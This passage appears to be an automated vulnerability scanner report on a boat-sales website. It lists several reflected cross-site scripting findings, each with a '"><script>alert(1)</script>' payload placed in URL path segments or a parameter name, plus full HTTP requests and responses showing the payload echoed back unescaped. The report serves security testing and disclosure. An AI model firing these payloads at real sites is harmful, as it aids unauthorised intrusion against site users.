com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&e5500"><script>alert(1)</script>7542b1e6f36=1&units=Feet&seo=0&checked_boats=2272100&boat_id=2272100&back=/core/boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States&boat_id=2272100">
...[SNIP]...

3.169. http://www.yachtworld.com/boats/2009/Regulator-32-Fs-2300541/Sardegna-centro-orientale/Italy [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2009/Regulator-32-Fs-2300541/Sardegna-centro-orientale/Italy

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60999"><script>alert(1)</script>48b0e3c5dc6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2009/Regulator-32-Fs-2300541/Sardegna-centro-orientale60999"><script>alert(1)</script>48b0e3c5dc6/Italy HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:55 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 12 Jan 2011 13:33:54 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2300541%5B%25%5D32%27+Regulator+32+FS%5B%25%5DEUR%26nbsp%3B180%2C000%5B%25%5DSardegna+centro+orientale%2C+Italy%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F0%2F5%2F2300541_1_mini.jpg%3F1294838885000%5B%25%5D%2Fboats%2F2009%2FRegulator-32-FS-2300541%2FSardegna-centro-orientale%2FItaly%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:55 GMT
Set-Cookie: VIEWED_BOATS_STORE=2300541%5B%25%5D32%27+Regulator+32+FS%5B%25%5DEUR%26nbsp%3B180%2C000%5B%25%5DSardegna+centro+orientale%2C+Italy%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F0%2F5%2F2300541_1_mini.jpg%3F1294838885000%5B%25%5D%2Fboats%2F2009%2FRegulator-32-FS-2300541%2FSardegna-centro-orientale%2FItaly%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
el="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2300541&boat_id=2300541&back=/core/boats/2009/Regulator-32-Fs-2300541/Sardegna-centro-orientale60999"><script>alert(1)</script>48b0e3c5dc6/Italy&boat_id=2300541">
...[SNIP]...

3.170. http://www.yachtworld.com/boats/2009/Regulator-32-Fs-2300541/Sardegna-centro-orientale/Italy [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2009/Regulator-32-Fs-2300541/Sardegna-centro-orientale/Italy

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec415"><script>alert(1)</script>4d7f969be73 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2009/Regulator-32-Fs-2300541/Sardegna-centro-orientale/Italyec415"><script>alert(1)</script>4d7f969be73 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:24 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 12 Jan 2011 13:33:54 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2300541%5B%25%5D32%27+Regulator+32+FS%5B%25%5DEUR%26nbsp%3B180%2C000%5B%25%5DSardegna+centro+orientale%2C+Italy%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F0%2F5%2F2300541_1_mini.jpg%3F1294838885000%5B%25%5D%2Fboats%2F2009%2FRegulator-32-FS-2300541%2FSardegna-centro-orientale%2FItaly%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:24 GMT
Set-Cookie: VIEWED_BOATS_STORE=2300541%5B%25%5D32%27+Regulator+32+FS%5B%25%5DEUR%26nbsp%3B180%2C000%5B%25%5DSardegna+centro+orientale%2C+Italy%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F0%2F5%2F2300541_1_mini.jpg%3F1294838885000%5B%25%5D%2Fboats%2F2009%2FRegulator-32-FS-2300541%2FSardegna-centro-orientale%2FItaly%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
follow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2300541&boat_id=2300541&back=/core/boats/2009/Regulator-32-Fs-2300541/Sardegna-centro-orientale/Italyec415"><script>alert(1)</script>4d7f969be73&boat_id=2300541">
...[SNIP]...

3.171. http://www.yachtworld.com/boats/2009/Regulator-32-Fs-2300541/Sardegna-centro-orientale/Italy [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2009/Regulator-32-Fs-2300541/Sardegna-centro-orientale/Italy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cf47"><script>alert(1)</script>a585151a92c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2009/Regulator-32-Fs-2300541/Sardegna-centro-orientale/Italy?8cf47"><script>alert(1)</script>a585151a92c=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:26 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 12 Jan 2011 13:33:54 GMT
Content-Language: en-US
